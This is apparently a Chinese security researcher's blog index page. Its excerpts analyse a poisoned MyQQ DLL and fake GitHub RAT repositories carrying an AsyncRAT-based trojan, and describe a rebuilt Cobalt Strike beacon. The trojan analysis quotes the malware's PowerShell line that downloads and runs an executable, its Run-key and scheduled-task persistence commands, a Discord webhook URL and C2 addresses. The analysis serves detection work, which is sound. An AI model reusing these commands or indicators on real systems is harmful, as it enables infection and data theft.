WBGlIl


  • 首页

  • 关于

  • 标签

  • 分类

  • 归档

随手分析MyQQ MyQQA MyQQG供应链投毒

发表于 2022-07-03

服务器被搞,核心DLL被恶意修改

正常MyQQApi.dll

被投毒后的

因为MyQQApi操作太简单了所以不说了
就是释放内嵌的木马svchost.exe到指定目录,然后启动

释放的svchost.exe其实是一个麦咖啡的exe(mcinsupd.exe)来自McAfee VirusScan Plus产品

被改造后的sub_40F0D3函数被替换了一个jmp sub_40F3FE
这个被修改成了shellcode

首先是初始化api,然后socket连接到a2.fafafazq.com

发送7数据然后接收shellcode在分配内存执行

不过响应的太快了导致我根本就没有拿到shellcode
到这里也就断了,微步上的流量里也没有shellcode部分

没啥太大可说的就这样吧

随手分析

发表于 2022-06-03

随手分析

今天和往常一样我打开github随便浏览了一下新项目

浏览的过程中我看到timwhitez大佬关注了个项目

image-20220603160632672

https://github.com/MerlynXS/Pegasus-Pantheon-HVNC-V2-VNC-Hidden-Browser-Remote-Administration-Rat

是之前网上售卖的一款rat工具然后我就顺便点了一下这个的主页发现他上传了许多了的rat,然后我就关注了一下

image-20220603160800333

顺便随便下载了一个打算看看是个什么钩8玩意,不过下载到本地后发现事情并没有那么简单

为什么这么说呢

image-20220603161000017

好家伙是个马,用了文件名反转来钓鱼.scr。然后我又去看了其他所有项目的发现所有的sln全是.scr。那就来分析一下吧,这里还有个小插曲,过了一会我朋友yansu大佬就过来找我了(大概是看到我github活动关注了这个钓鱼的)事实上也确实是这样

image-20220603161313151

他这个.scr文件是用的捆绑器(Celesty File Binder)进行捆绑的,他把sln文件和exe文件捆绑在了一起然后通过Unicode控制字符RLO来达到反转文件名(当然我感觉这并没什么屌用,都是研究人员还来这套属实是太瞧不起人了)

与sln文件捆绑在一起的是一个.NET文件

image-20220603161947507

不过这个.NET只是一共loader,它内部有一个资源文件

image-20220603162058378

这个文件反转后是一个.NET PE文件,会被loader内存加载执行

image-20220603162251218

dump下来后继续分析(文件被加壳了同时使用了虚拟化)

image-20220603162446014

image-20220603162549760

用de4dot配合手动解混淆后勉强可以看

启动后木马会执行cmd /c timeout 延迟等待N秒用来反沙箱

随后释放Bbxodsfpqzzzzzzzzzzzzzzzz.exe文件到Temp目录执行这个我们先不管

image-20220603164023710

接着创建C:\Users\admin\AppData\Roaming\Ltntuhk目录,并将自身copy过去

image-20220603164450393

设置自启动

image-20220603164528626

image-20220603164706398

请求tg或Discord

image-20220603165409112

image-20220603165436136

image-20220603165449690

他这里配置的是Discord没有用tg

https[:]//discord.com/api/webhooks/930517839058731038/wxqMQna6kAtTNVhmGukOHlrW-WHQkRPOYSzWz2dfuTvv9WOf8jk0mo11B08FfFEQzBLB

中间还有一堆没啥用的操作主要就是创建进程注入进程之类的,里面还用到了一个开源项目https://github.com/snovvcrash/DInjector

最后就是加载资源_._.resources‎解密后注入运行

这个也是一个.net pe这次是rat主体

image-20220603174520849

手动反混淆后经过分析发现是asyncrat变种并没有什么屌用

C2:217.64.31.3:8808,8437

前面释放的那个Bbxodsfpqzzzzzzzzzzzzzzzz.exe文件也是用Celesty File Binder捆绑器生成的里面包含两个.NET PE文件

其中SOFTINCA CRYPT.EXE是执行powershell

1
2
Start-Sleep -Seconds 40;(New-Object SystemNetWebClient)DownloadFile('https://filebin2awsatsigncloud/93i3on1d3fta8ijh/dc_cryptexe',(Join-Path -Path $env:AppData -ChildPath 'WindowsSecurtyexe')); 
Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'WindowsSecurtyexe')

V_PROTECTED.EXE有混淆处理后分析

将自身复制到C:\Users\admin\AppData\Roaming\SecurtyService\SecurtyService.exe

创建自启动

1
Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'

创建计划任务

1
cmd /C schtasks /create /tn \SecurtyService /tr "C:\Users\admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f

启动regasm

1
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

image-20220603185417071

最后注入资源文件里保存的asyncrat木马,这个和上面的一样没啥可说的

后话

其实这个钓鱼根本没有什么分析的必要技术太低我都懒的看,正好今天放假而且博客也很久没更新了就随便写写吧

好歹你也是钓研究人员你这反转文件名看不起谁呢,用sln文件投毒都比这反转文件名强,免杀也是稀烂

image-20220603190131791

很久没写博客今天写的时候md发现博客坏了,服了又修了半天博客

恢复windows server 2019 剪贴板历史记录功能

发表于 2021-12-22

最近装了个Windows Server 2022玩玩当熟练的按下Win+V的时候发现竟然没办法呼出剪贴板
就想着能不能恢复一下首先到设置里面查看并没有发现剪贴板选项
有点尴尬,不过想着Windows Server是基于Windows10应该差别不会太大就跑去Windows10上查看一下Win+V的快捷键注册者
image.png

发现是explorer.exe,不出意料,既然是explorer.exe注册的那就基本可以肯定应该是通过注册表什么选项进行控制的总不可能Server还单独一份explorer.exe吧

打开IDA拖入explorer.exe过滤导入表

image.png

转到交叉引用

image.png

选择全局快捷键注册

在这之中有一个IsCloudAndHistoryFeatureSupportedSKU函数引起了我的注意

双击进去查看IsCloudAndHistoryFeatureSupportedSKU

image.png

根据名字感觉就是这个转到注册表查看确实没有那我们自己新建一个

image.png

关机重启

按下win+v熟悉的剪贴板又回来了

image.png

UEFI Bootkit

发表于 2021-12-02

没有找到适合的图片

好久没写博客了发一篇笔记

阅读全文 »

一份未完成的cobalt strike beacon代码

发表于 2021-07-27

一份未完成的cobalt strike beacon代码

这几天因为一些原因跑去还原了一下Beacon的代码,整体上还原了大部分,功能实现没有

image-20210727162517551.png

差不多一百多个功能

整体的框架已经还原完的跟原版beacon.dll一样可以使用cs的配置文件不是写死的

使用方式生成一个raw格式

image-20210727163444330.png

然后用16进制编辑器打开生成的bin 搜索2E 2F 2E 2F 2E

image-20210727163641710.png

然后从这个位置开始选择往后4096个字节把它复制下来替换到项目里

image-20210727163909344.png

image-20210727163951511.png

运行后效果如下没有任何功能

image-20210727170409472.png

基本通信流程就是首先解密配置然后对c2配置进行解析格式化

image-20210727173410342.png

然后解析一些需要用的配置

image-20210727173739335.png

构造元数据 设置http请求 发送元数据 接受返回信息 解密并格式化然后交由Parse_Task处理去执行任务

image-20210727173957816.png

任务执行完发送结果,主要依靠sub_10012CF这个函数
这个还会调用其他函数,其他函数进一步包装返回数据

image-20210727180511591.png

与之对应的服务端在接收数据解密后会根据返回id进行处理

image-20210727180851612.png

image-20210727180955945.png

其中id 31表示此任务执行错误,然后首先读取一个int然后根据这个int判断要显示的错误信息

image-20210727181148667.png

image-20210727181601501.png

项目地址:https://github.com/WBGlIl/Beacon_re
项目依赖libtommath-0.42.0和libtomcrypt-1.17,整个项目的代码非常糟糕慎重考虑是否要看
懒的搞了写的也很随意

Windows ETW之监控进程

发表于 2021-06-07 | 分类于 ETW

没有找到合适的图片

阅读全文 »

某驱动脱壳 vmp

发表于 2021-04-05 | 分类于 逆向 , 脱壳

没有找到适合的图片

阅读全文 »

某感染病毒分析查杀

发表于 2021-03-15 | 分类于 分析 , 恶意样本

没有找到适合的图片

阅读全文 »

MiniDumpWriteDump杂记

发表于 2021-02-19 | 分类于 Windows , 二进制

暂无图片

阅读全文 »

关于cs3.14所谓的后门分析溯源结果

发表于 2020-12-19

没有找到合适的图片

阅读全文 »
12…4
WBGlIl

WBGlIl

40 日志
20 分类
30 标签
大佬们的博客
  • 只因不值得
  • 九世
  • Demon
  • 即刻安全
  • Yansu
  • 青鸟
  • 蚊子の博客
  • biebie
  • 曾哥
© 2022 WBGlIl
由 Hexo 强力驱动
|
主题 — NexT.Gemini v5.1.4